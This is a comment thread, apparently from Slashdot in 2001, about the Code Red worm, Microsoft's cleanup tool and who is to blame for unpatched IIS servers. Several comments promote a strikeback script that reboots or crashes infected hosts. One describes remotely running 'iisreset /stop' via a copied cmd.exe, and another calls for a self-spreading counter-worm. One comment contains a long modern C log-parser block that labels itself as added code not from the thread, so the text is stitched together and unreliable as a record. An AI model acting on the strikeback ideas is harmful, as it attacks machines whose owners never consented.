    I understand what his point was. And yes, I understand commercial software schedules and the need to ship code (I am a corporate cog by day). I understand that under the circumstances, Microsoft has done all they can. However, the statement that "Microsoft fixed the problem before it was a problem" is still wrong. The statement "Microsoft fixed the problem before it showed any symptoms" is accurate.

    You people

    I hope you're not trying to make a generalization about any particular group, because it would be just as easy to make generalizations about the complement to that group. And I certainly hope you're not trying to fit me into a pigeonhole on account of a single comment on a particular website.

    --

    I like to play children's songs in minor keys.
    "We're all sons of bitches now." --J. Robert Oppenheimer

  298. Script doesn't work anyways by Dahan · · Score: 1
    Looks like this one works. Just done it on my own machine. Can anyone confirm that it really does, please?

    Works in what way? If you mean it sends the HTTP request, then yeah, that probably does work. But it's not gonna shut down IIS.

    I just tried copying cmd.exe to the scripts directory on an IIS box and sent a query for it to do an iisreset /stop and I get an Access denied error. I don't think the IUSR_ account has permission to stop services.

    Maybe what'd work is to take advantage of the buffer overflow and just send a bunch of junk to make IIS crash, instead of attempting a clean shutdown.

  299. Re:Not the mess they made... by Master+Bait · · Score: 1
    This deserves a -1,Retard.

    Hold your horses there, Redmond Breath!

    Any competent IT admin who uses Windows is probably frustrated and angry. Why don't you take those skills and get a GOOD job...

    --
    "Only in their dreams can men truly be free 'twas always thus, and always thus will be."
    --Tom Schulman
  300. Re:Not the mess they made... by Fishstick · · Score: 2, Informative

    It is worse than that, actually.

    Here, all of the W2K workstation boxes were infected. These are not sysadmins or developers who should know better, these are just all the people who work here and are provided with a workstation to do their jobs and have no idea that IIS is running on their machines.

    They have no idea and weren't ever told that they need to apply any patches. Couple days after the CR panic started to spread, we got an alert from our crack security administration group that we should download and install a patch from Microsoft if we were running any NT servers.

    Of course, none of them knew what the hell this meant, so they assumed it didn't apply to them and so did nothing.

    Sheesh, what a mess!

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  301. Re:Not the mess they made... by knorthern+knight · · Score: 2, Insightful

    > I mean at some point not everyone in the
    > world can be a computer expert,

    A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?

    > so are you recommending that people that
    > aren't shouldn't have a computer?

    If they are not willing/able to bring themselves up to the necessary level of competence to run general-purpose computers, yes. Give me a manually operated medium-format or 35 mm SLR camera, and I'm just as helpless as a Mac or Windows user at a unix commandline. If it ain't point-and-click, I'm totally lost. That doesn't mean I'm stupid; just that I'm not competent to use a particular tool.

    > There wouldn't be a computer industry if it
    > weren't for the "stupid" people needing
    > computers to help out their jobs and lives.
    > What we need to do is constructively help make
    > the experience good and safe for everyone.

    That's where WEB-TV are aiming at. They are to the general-purpose computer what the point-n-click camera is to professional equipment. The great majority of people aren't geeks. That's not disparagement; merely admitting that Joe Average is no more competent to operate a general purpose computer than I am to manually operate a medium-format camera. It's not an admission of stupidity, just an acknowledgement that different people have different competencies.

    --

    I'm not repeating myself
    I'm an X window user; I'm an ex-Windows user
  302. Re:Not the mess they made... by jeffy124 · · Score: 3, Interesting

    On top of that, the admins who missed repeated pleas from both Microsoft and Government officials urging them to install the patch, not to mention all the publicity the pleas and the virus made on CNN (both the website and on TV), other major national news networks, and even my local (Washington DC area) television news stations.

    --
    The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
  303. The $64K question: Does it actually work? by NReitzel · · Score: 1

    I'm glad to see someone at Microsoft stepping up to the plate, so to speak, to try and provide a comprehensible tool for nonprofessional users of their products. I am actually a little surprised that they released such a product at all, on the theory that their lawyers must have warned them that by releasing a cleanup tool, they have perforce admitted to having a problem in the first place. Kudos to Microsoft, who (for once) have placed the quality of their product ahead of the veracity of their legal department.

    --

    Don't take life too seriously; it isn't permanent.

  304. So... by Anonymous Coward · · Score: 0

    So they are now distributing copies of FreeBSD or fdisk?

  305. Re:Not the mess they made... by uchian · · Score: 1
    I know how completely absurd it is to assume that because someone is using Windows, they have no computer savvy.

    This is possibly off topic, but I will say that I've been using various windows versions since Windows 95 came out (admittedly Windows NT/2000 only as a user, never with sysadmin access), and I still don't know exactly where different things are stored in the registry, how I could figure out what is wrong and fix it manually if the need ever arises (normally every six months or so with Windows 98).

    I've been using Linux for about 6 months and have a pretty good idea how to do all of the above. Why? Because by nannying the user through everything, the user never _learns_ anything about Windows. Even now, any advice I ever heard about questions about Windows start "Um, have you tried rebooting?, no that didn't help? Try reinstalling it then..." and quite often gets no further.

    Perhaps I simply have not found the correct information sources that you have, in which case I would appreciate hearing about them. If they mention the use of Wizards, they don't count:-)

  306. Strikeback script by vla1den · · Score: 1

    Please note this Code Red Strikeback script. If you can, install it! Don't forget to add default.txt with it, so others can download it from you too.

    This is a good thing.

    Yeah, and BTW, if somebody will rewrite it in PHP it'll be good too: I can not put executable cgi in my www directory...

  307. Wow, what a tool by absurd_spork · · Score: 2, Insightful
    What a great tool that removes a couple of predefined files and reboots a system, nothing an admin couldn't have done himself in three minutes.

    I hope it's Microsoft-certified to work, at least.

    And disabling your web server as an option to keep your web server free from infection is so ingenious that I completely lack the words to describe the ingenuity behind it.

  308. Anybody who thinks... by talks_to_birds · · Score: 4, Insightful
    ...this is at the "mopping-up" stage is nuts.

    08/10/01 I received a total of 132 probes to tcp:80 on my 12.82.x.x dynamic IP via my dialup to worldnet.att.net

    These are exclusively from other dialups and small-scale hosts in AT&T's 12.x.x.x class A; AT&T has introduced ingress filtering and I'm seeing almost nothing from outside (Note: almost - some stuff is still leaking through..)

    But the problem is the enemy within: there's got to be thousands of home/SOHO small systems, maybe single boxes, put together by the hotshot early-adopters and techno-yuppies who think it's cool to go through the checkout stand at CompUSA and purchase a copy of Win 2K Professional, or whatever, and put it on their home systems with all the bells and whistles installed.

    None of these boxes are under *any* formal administrative control, and it's going to be up to each and every one of these thousands of techno-yuppies to patch each and every single one of their boxes.

    So far today 08/11/01 at 10:00am I've had 69 probes.

    As far as I can see, getting all these systems disinfected and patched hasn't even started yet.

    t_t_b

    --
    I'm on PJ's "enemies" list! Are you?
  309. This script has potential by myov · · Score: 1

    I had 11 connection attempts within a 1/2h of installing this script. While it's easy to reboot the remote box (and laugh), couldn't this script do something a little more useful, like display a warning message to the user that they are infected?

    --
    I use Macs to up my productivity, so up yours Microsoft!
  310. Re:Not the mess they made... by Digitalia · · Score: 1

    "And, so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing to install them?"

    Yes. They decided that they knew more than those who discovered the exploit and consciously decided, "I know more than they do; there is no risk," or "It's just another stupid worm. No big deal."

    It was either hubris or negligence. Both are things that shouldn't be excused.

    --
    Pax Digitalia
  311. MS Tool by mellonhead · · Score: 0, Troll

    I'm amazed they aren't charging for it...

  312. Permanently disable IIS?????? by very · · Score: 1

    Isn't it called "UNINSTALL"? Maybe next time Microsoft will tell people not to install IIS in the first place.

  313. A (partial) solution? by SpookyFish · · Score: 1


    Ok, some enterprising and ethical hacker out there needs to make a new version of Code Red (Version -1?) that exploits the hole, puts a message somewhere obvious with a link to a web site for more info, disables the hole and runs for a few days spreading around like the other variants, and then disables itself.

    Wouldn't that make a nice dent?

    1. Re:A (partial) solution? by Anonymous Coward · · Score: 0
  314. Zodiac by Amphigory · · Score: 2
    (SPOILER WARNING)

    Anybody ever read Zodiac, by the always-popular Neal Stephenson? Short plot: the bad guys are dumping PCBs in Boston Harbor. They invent a genetically engineered bacterium to eat all the PCBs. They also invent one to make PCBs along the way, which accidentally gets loose and threatens to destroy the planet.

    I wonder how long it's going to be before some good-hearted, but slightly insane, person writes a Virus to close security holes in Windows? Then what happens when it trashes every version other than Windows 95 OEMSR3.1 (or whatever -- I don't run windows.) Would Microsoft do such a thing to cover up their mistakes? Would we ever know if they did?

    Incidentally, in my more evil moments, I had thought that a virus to change everyone's default web browser to Netscape would be kind of poetic justice. Let me say, up front, that I would not write one and am not advocating that anyone else does so. But it would be an interesting use of the sircam code.

    --
    -- Slashdot sucks.
  315. Damn.. I gave them the idea! by Mazzella! · · Score: 1

    The Old SSI version was my doing ;) Check out the archives of the Las Vegas LUG for a better explanation of what I did with the SSI.

    --
    1.3L, 3 moving parts, 280 HP, no Turbos, wanna Race? RotaryNe
  316. Re:Warhol Worm proposed: 15 minutes to total infec by Phork · · Score: 4, Insightful

    Well, not really; the IPv6 address space will be largely unused. But the areas that are used will be well known; it would be very easy to specify the good ranges to scan.

    --
    -- free as in swatantryam - not soujanyam.
  317. quit sendin me scat by blendin · · Score: 0

    quit sendin me scat

  318. the script provided for Apache users by evildead · · Score: 1

    Ummm... from a somewhat pedantic point of view, it's a denial of service attack against the machine in question. Whether or not such 'black ICE' measures are ethical is a long drawn out question; but as to their legality -- I would say no.

  319. The real reason to blame Microsoft by daviddennis · · Score: 2

    Microsoft marketing says:

    "You're a trained monkey. You too can run a web server! Just blow $1,000 on our systems and you're all set."

    The person who believed Microsoft when they said that is partially to blame, surely, but in the beginning it's Microsoft that has to take the hit for overpromising and underdelivering. If you promise a secure product anyone can use, well, you're on the hook if you don't supply one.

    D

  320. Re:Not the mess they made... by FunkyRat · · Score: 1

    I agree with you that it is elitist to think that one should have to be a computer expert in order to use a computer to do their everyday job, just as it is ridiculous to think that everyone who drives a car should be an auto mechanic. However, if you drive a car you are expected to know some basic things such as to check your oil frequently, to have your oil replaced every 3,000 miles or so, make sure there is enough air in your tires, etc. Otherwise you run the risk of at the least expensively damaging your vehicle, at the most putting yourself in a life threatening situation. Similarly, one should have some basic knowledge about their computer, operating system, applications and a little general knowledge about things like basic security.

    Yeah, here on Slashdot we all probably do come down too hard on Microsoft for the quality of their products. I can't believe that MS deliberately releases bug ridden software full of security holes, and I think one has to admit that quite a few of their products are really very good.

    On the other hand, MS support is horrible. Heck, they don't even offer any kind of useful free support if your copy of Windows was purchased from an OEM (preinstalled on your computer when you bought it). There may be a lot of people in the Linux community who will shout RTFM when asked a question by a newbie, but in general you will find that most people in the community are genuinely helpful and supportive of those with less than expert knowledge.

  321. Blame people that ENCOURAGE this... by Svartalf · · Score: 2

    Microsoft's whole philosophy and marketing is that "it's easy to do" and that "anybody can do it".

    Applying patches isn't always easy- sometimes you've got to do it often.

    System security isn't easy- ever.

    Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

    I blame them not because they're big- I blame them because they fostered this BS in the first place!

    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
  322. Since when? by ZxCv · · Score: 1

    IIS is NOT part of the default install for Win2k Pro. Whoever told you that is wrong and if it was installed when you booted the box for the first time, it was because whoever built your box put it there.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  323. One Question? by Anonymous Coward · · Score: 0

    Couldn't this all be solved with an Automatic Update or New Version alert like they are sticking in all their other software?

  324. Re:Not the mess they made... by kurt555gs · · Score: 1

    Someone on /. has this in their tag line: "An MSCE is to computing what a McDonalds Certified Food Specialist is to fine cuisine." If someone really had any computer savvy... they would be using *NIX. (period)

    --
    * Carthago Delenda Est *
  325. Re:The $64K question: Does it actually work? by rambot · · Score: 1

    Microsoft needs to get the hell away from the plate. That's the real problem. They have failed us with IIS over and over again. Hackable bloatware at its finest. Ignorance is not an excuse! I think you know what I mean.

  326. Re:Not the mess they made... by SilentChris · · Score: 2

    Actually, it was the mess the hackers created.

  327. Speaking of Microsoft... by brainthought · · Score: 1

    Anyone catch the new anti-clippy (the paperclip Office assistant) site over at Microsoft? Never seen them turn on one of their own like that...

  328. The video... by MyAss · · Score: 1

    What format is the video in? I get nothing in linux and my friend said it only worked for him in IE and not in Netscape in Windows.

    --

    They misunderestimated me. -- George W. Bush
  329. Re:Not the mess they made... by rprycem · · Score: 1

    Mod this guy up high... That was one of the best things I have ever seen. That IBM guy has some balls :-p

  330. How about modifying the routers by SnarfQuest · · Score: 1

    How about changing the router stack on the Linux/BSD boxes to automatically drop all of the CodeRed connection attempts. That would potentially reduce the load this virus is generating, and maybe then my DSL modem won't crash as often.

    --
    Who would win this election: Andrew Weiner vs Andrew Weiner's weiner.
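    Dropping the worm's connection attempts at a router first needs a list of the addresses making them, and the web server's own access log already has it: every probe is a request for /default.ida. The following is an added example, not code from this thread or from any of the scripts it links to, that scans Apache common-log-format lines for that request and tallies probes per client address, which is the list you would feed into a packet filter or hand to the upstream provider. The log lines are constructed for the example (documentation-range addresses, a made-up query string), and the names is_code_red_probe, client_ip and count_probes are my own.

```c
#include <stdio.h>
#include <string.h>

#define MAX_HOSTS 64
#define IP_LEN 16          /* dotted quad plus NUL */

typedef struct {
    char ip[IP_LEN];
    int hits;
} HostCount;

/* Constructed sample access log (Apache common log format), not real
 * traffic; the addresses are from the RFC 5737 documentation ranges. */
static const char *const SAMPLE_LOG[] = {
    "192.0.2.10 - - [10/Aug/2001:09:15:02 -0700] \"GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0\" 404 276",
    "192.0.2.10 - - [10/Aug/2001:09:16:44 -0700] \"GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0\" 404 276",
    "198.51.100.7 - - [10/Aug/2001:09:17:01 -0700] \"GET /index.html HTTP/1.1\" 200 1043",
    "192.0.2.11 - - [10/Aug/2001:09:18:30 -0700] \"GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0\" 404 276",
    "203.0.113.9 - - [10/Aug/2001:09:19:12 -0700] \"HEAD /default.ida HTTP/1.0\" 404 0",
};
#define SAMPLE_LOG_COUNT ((int)(sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]))

/* 1 if the quoted request field asks for /default.ida (any method, with
 * or without a query string), the URL the Code Red worms probe; else 0. */
int is_code_red_probe(const char *line)
{
    const char *q = strchr(line, '"');      /* start of "METHOD path proto" */
    if (q == NULL)
        return 0;
    const char *path = strchr(q + 1, ' ');  /* skip the method token */
    if (path == NULL)
        return 0;
    path++;
    return strncmp(path, "/default.ida", strlen("/default.ida")) == 0;
}

/* Copy the leading client-address token into out. 0 on a malformed line
 * or a token that would not fit, so out is never overrun. */
int client_ip(const char *line, char *out, size_t outSize)
{
    size_t n = strcspn(line, " ");
    if (n == 0 || n >= outSize)
        return 0;
    memcpy(out, line, n);
    out[n] = '\0';
    return 1;
}

/* Tally probes per client address. Returns the number of distinct hosts
 * filled into hosts[] (first-seen order); hosts beyond maxHosts are
 * ignored rather than written past the array. */
int count_probes(const char *const *lines, int nlines, HostCount *hosts, int maxHosts)
{
    int nhosts = 0;
    for (int i = 0; i < nlines; i++) {
        char ip[IP_LEN];
        if (!is_code_red_probe(lines[i]) || !client_ip(lines[i], ip, sizeof ip))
            continue;
        int j;
        for (j = 0; j < nhosts; j++)
            if (strcmp(hosts[j].ip, ip) == 0)
                break;
        if (j == nhosts) {
            if (nhosts == maxHosts)
                continue;
            strcpy(hosts[j].ip, ip);   /* fits: client_ip bounded it to IP_LEN-1 */
            hosts[j].hits = 0;
            nhosts++;
        }
        hosts[j].hits++;
    }
    return nhosts;
}

int main(void)
{
    HostCount hosts[MAX_HOSTS];
    int n = count_probes(SAMPLE_LOG, SAMPLE_LOG_COUNT, hosts, MAX_HOSTS);
    for (int i = 0; i < n; i++)
        printf("%-16s %d probe(s)\n", hosts[i].ip, hosts[i].hits);
    return 0;
}
```

    Matching on the request path rather than on the query string keeps the check independent of which variant is probing, and a 404 for /default.ida is already what an Apache box returns, so the only cost of the worm is the bandwidth and the log noise that this tally lets you attribute to specific sources.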
  331. What if by ArchieBunker · · Score: 1

    The tables were turned? You had millions of Red Hat 6.0 boxes all running the default install with no patches or security measures applied. I have seen plenty of unpatched Unix boxes, so it's not only MS people. If the statistics were different, would you blame Red Hat for making an insecure product, or the clueless users?

    --
    Only the State obtains its revenue by coercion. - Murray Rothbard
  332. Not the mess they made... by shagoth · · Score: 3, Insightful

    It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins.

    1. Re:Not the mess they made... by Frater+219 · · Score: 3, Insightful
      Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.
      When my favorite open-source project discovers a security hole, it releases the patch in such a way that you can install it with a single command. Microsoft has an equivalent to this -- it's the "Critical Updates" section of the "Windows Update" facility. They frequently put important security and bug-fix patches in this section, so that Windows users can easily access them. This also makes it easy for site IT staff to encourage users to keep their systems up to date.

      The default.ida patch, a fix for a root-level compromise, was not placed in Critical Updates. Without either searching the site or being told of the correct URL to download the patch, users could not find it. People who used Windows Update religiously in the expectation of keeping their systems up to date were screwed. Sites which instructed their users that setting Windows Update to perform automatic updates would help keep them secure were screwed.

      Once again, Microsoft created an expectation and failed to live up to it.

  333. test, please ignore by Anonymous Coward · · Score: 0

    testing linking

  334. Getting the default.ida working v2.0 by Dwaine+Garden · · Score: 1

    Nope... I just get a permission problem when I access the page. Ummmmm... I have read all the messages and the additions to the config file are in there.

    I'm using Apache v2.0+. Is there anything special that I'm missing? And yes, I checked the permissions on the htdocs directory and the default.ida file.

    ooohhh man......

    help...

    Thanks...